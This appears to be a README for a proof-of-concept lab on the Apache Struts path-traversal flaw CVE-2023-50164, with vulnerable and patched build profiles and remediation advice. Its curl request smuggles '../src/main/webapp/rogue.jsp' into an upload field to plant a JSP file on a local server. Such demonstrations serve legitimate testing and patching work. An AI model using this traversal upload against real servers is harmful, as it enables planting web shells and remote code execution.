Share
## https://sploitus.com/exploit?id=012A2C8A-0673-5AF7-9081-06F57EDBBDB5
This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), which outlines a
new path traversal vulnerability which can lead to Remote Code Execution (RCE) in 
[struts-core](https://struts.apache.org/). 

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).

## Run the PoC

There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.

To run _with the RCE vuln_, execute the following:

```
mvn clean jetty:run -P vuln
```

To run _without the RCE vuln_, execute the following:

```
mvn clean jetty:run -P no-vuln
```

The difference between the two profiles is `vuln` uses `struts-core` version `6.3.0.1` 
(which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2` 
(which does not have the path traversal vulnerability)

## Exploit the Vuln

while running the `vuln` profile described above, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).

There is a code fix solution that works with the older Struts versions, _but_, it is still highly advised to update
your version of Struts.

To exercise the code fix, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll see an error message: `Attempted path traversal attack`

**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln` 
endpoint, even if you use a relative path like: `../src/main/webapp/rogue.jsp`, as the new version of struts 
automatically strips away relative path references.